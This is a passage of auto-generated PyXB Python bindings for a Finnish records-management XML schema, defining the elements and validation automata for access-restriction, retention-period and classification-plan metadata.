final_update.add(fac.UpdateInstruction(cc_4, False))
symbol = pyxb.binding.content.ElementUse(kasittelysaannotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Laajennos')), None)
st_4 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_3, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_3, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_4, True) ]))
st_4._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
kasittelysaannotTyyppi._Automaton = _BuildAutomaton_4()
kayttorajoitusTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'JulkisuusluokkaKoodi'), julkisuusluokkaKoodiTyyppi, scope=kayttorajoitusTiedotTyyppi, location=None))
kayttorajoitusTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SalassapitoAikaArvo'), salassapitoAikaArvoTyyppi, scope=kayttorajoitusTiedotTyyppi, location=None))
kayttorajoitusTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SalassapitoPerusteTeksti'), salassapitoPerusteTekstiTyyppi, scope=kayttorajoitusTiedotTyyppi, location=None))
kayttorajoitusTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SalassapidonLaskentaperusteTeksti'), salassapidonLaskentaperusteTekstiTyyppi, scope=kayttorajoitusTiedotTyyppi, location=None))
kayttorajoitusTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SuojaustasoKoodi'), suojaustasoKoodiTyyppi, scope=kayttorajoitusTiedotTyyppi, location=None))
kayttorajoitusTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'TurvallisuusluokkaKoodi'), turvallisuusluokkaKoodiTyyppi, scope=kayttorajoitusTiedotTyyppi, location=None))
kayttorajoitusTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'HenkilotietoluonneKoodi'), henkilotietoluonneKoodiTyyppi, scope=kayttorajoitusTiedotTyyppi, location=None))
kayttorajoitusTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Laajennos'), CTD_ANON_, scope=kayttorajoitusTiedotTyyppi, documentation='Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.', location=None))
def _BuildAutomaton_5 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_5
del _BuildAutomaton_5
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_3)
cc_4 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_4)
cc_5 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_5)
cc_6 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_6)
cc_7 = fac.CounterCondition(min=0, max=None, metadata=None)
counters.add(cc_7)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(kayttorajoitusTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'JulkisuusluokkaKoodi')), None)
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(kayttorajoitusTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'SuojaustasoKoodi')), None)
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(kayttorajoitusTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'TurvallisuusluokkaKoodi')), None)
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_3, False))
symbol = pyxb.binding.content.ElementUse(kayttorajoitusTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'HenkilotietoluonneKoodi')), None)
st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_4, False))
symbol = pyxb.binding.content.ElementUse(kayttorajoitusTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'SalassapitoAikaArvo')), None)
st_4 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_5, False))
symbol = pyxb.binding.content.ElementUse(kayttorajoitusTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'SalassapitoPerusteTeksti')), None)
st_5 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_6, False))
symbol = pyxb.binding.content.ElementUse(kayttorajoitusTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'SalassapidonLaskentaperusteTeksti')), None)
st_6 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_6)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_7, False))
symbol = pyxb.binding.content.ElementUse(kayttorajoitusTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Laajennos')), None)
st_7 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_7)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_2, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_3, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_3, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_4, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_4, False) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_5, True) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_5, False) ]))
st_5._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_6, True) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_6, False) ]))
st_6._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_7, True) ]))
st_7._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
kayttorajoitusTiedotTyyppi._Automaton = _BuildAutomaton_5()
sailytysaikaTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SailytysajanPituusArvo'), sailytysajanPituusArvoTyyppi, scope=sailytysaikaTiedotTyyppi, location=None))
sailytysaikaTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SailytysajanPerusteTeksti'), sailytysajanPerusteTekstiTyyppi, scope=sailytysaikaTiedotTyyppi, location=None))
sailytysaikaTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SailytysajanLaskentaperusteTeksti'), sailytysajanLaskentaperusteTekstiTyyppi, scope=sailytysaikaTiedotTyyppi, location=None))
sailytysaikaTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Laajennos'), CTD_ANON_, scope=sailytysaikaTiedotTyyppi, documentation='Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.', location=None))
def _BuildAutomaton_6 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_6
del _BuildAutomaton_6
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=None, metadata=None)
counters.add(cc_3)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(sailytysaikaTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'SailytysajanPituusArvo')), None)
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(sailytysaikaTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'SailytysajanPerusteTeksti')), None)
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(sailytysaikaTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'SailytysajanLaskentaperusteTeksti')), None)
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_3, False))
symbol = pyxb.binding.content.ElementUse(sailytysaikaTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Laajennos')), None)
st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_3, True) ]))
st_3._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
sailytysaikaTiedotTyyppi._Automaton = _BuildAutomaton_6()
TosTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'TilaKoodi'), tilaKoodiTyyppi, scope=TosTiedotTyyppi, location=None))
TosTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'TosVersio'), versioTyyppi, scope=TosTiedotTyyppi, location=None))
TosTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'LisatiedotTeksti'), lisatiedotTekstiTyyppi, scope=TosTiedotTyyppi, location=None))
TosTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'OrganisaatioNimi'), pyxb.binding.datatypes.string, scope=TosTiedotTyyppi, location=None))
TosTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'LaatijaNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, scope=TosTiedotTyyppi, location=None))
TosTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'LaadittuPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, scope=TosTiedotTyyppi, location=None))
TosTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'MuokkaajaNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, scope=TosTiedotTyyppi, location=None))
TosTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'MuokattuPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, scope=TosTiedotTyyppi, location=None))
TosTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyjaNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, scope=TosTiedotTyyppi, location=None))
TosTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyttyPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, scope=TosTiedotTyyppi, location=None))
TosTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloAlkaaPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, scope=TosTiedotTyyppi, location=None))
TosTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloPaattyyPvm'), _ImportedBinding_metarecord_binding__jhs.LoppuPvmTyyppi, scope=TosTiedotTyyppi, location=None))
TosTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'YhteyshenkiloNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, scope=TosTiedotTyyppi, location=None))
TosTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Laajennos'), CTD_ANON_, scope=TosTiedotTyyppi, documentation='Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.', location=None))
TosTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Nimeke'), nimekeTyyppi, scope=TosTiedotTyyppi, location=None))
def _BuildAutomaton_7 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_7
del _BuildAutomaton_7
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_3)
cc_4 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_4)
cc_5 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_5)
cc_6 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_6)
cc_7 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_7)
cc_8 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_8)
cc_9 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_9)
cc_10 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_10)
cc_11 = fac.CounterCondition(min=0, max=None, metadata=None)
counters.add(cc_11)
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(TosTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Nimeke')), None)
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(TosTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'YhteyshenkiloNimi')), None)
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
symbol = pyxb.binding.content.ElementUse(TosTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'TosVersio')), None)
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(TosTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'TilaKoodi')), None)
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(TosTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'OrganisaatioNimi')), None)
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(TosTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'LaatijaNimi')), None)
st_5 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_3, False))
symbol = pyxb.binding.content.ElementUse(TosTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'LaadittuPvm')), None)
st_6 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_6)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_4, False))
symbol = pyxb.binding.content.ElementUse(TosTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'MuokkaajaNimi')), None)
st_7 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_7)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_5, False))
symbol = pyxb.binding.content.ElementUse(TosTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'MuokattuPvm')), None)
st_8 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_8)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_6, False))
symbol = pyxb.binding.content.ElementUse(TosTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyjaNimi')), None)
st_9 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_9)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_7, False))
symbol = pyxb.binding.content.ElementUse(TosTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyttyPvm')), None)
st_10 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_10)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_8, False))
symbol = pyxb.binding.content.ElementUse(TosTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloAlkaaPvm')), None)
st_11 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_11)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_9, False))
symbol = pyxb.binding.content.ElementUse(TosTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloPaattyyPvm')), None)
st_12 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_12)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_10, False))
symbol = pyxb.binding.content.ElementUse(TosTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'LisatiedotTeksti')), None)
st_13 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_13)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_11, False))
symbol = pyxb.binding.content.ElementUse(TosTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Laajennos')), None)
st_14 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_14)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
]))
transitions.append(fac.Transition(st_4, [
]))
transitions.append(fac.Transition(st_5, [
]))
transitions.append(fac.Transition(st_6, [
]))
transitions.append(fac.Transition(st_7, [
]))
transitions.append(fac.Transition(st_8, [
]))
transitions.append(fac.Transition(st_9, [
]))
transitions.append(fac.Transition(st_10, [
]))
transitions.append(fac.Transition(st_11, [
]))
transitions.append(fac.Transition(st_12, [
]))
transitions.append(fac.Transition(st_13, [
]))
transitions.append(fac.Transition(st_14, [
]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_0, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_1, False) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_2, False) ]))
st_5._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_3, True) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_3, False) ]))
st_6._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_4, True) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_4, False) ]))
st_7._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_5, True) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_5, False) ]))
st_8._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_9, [
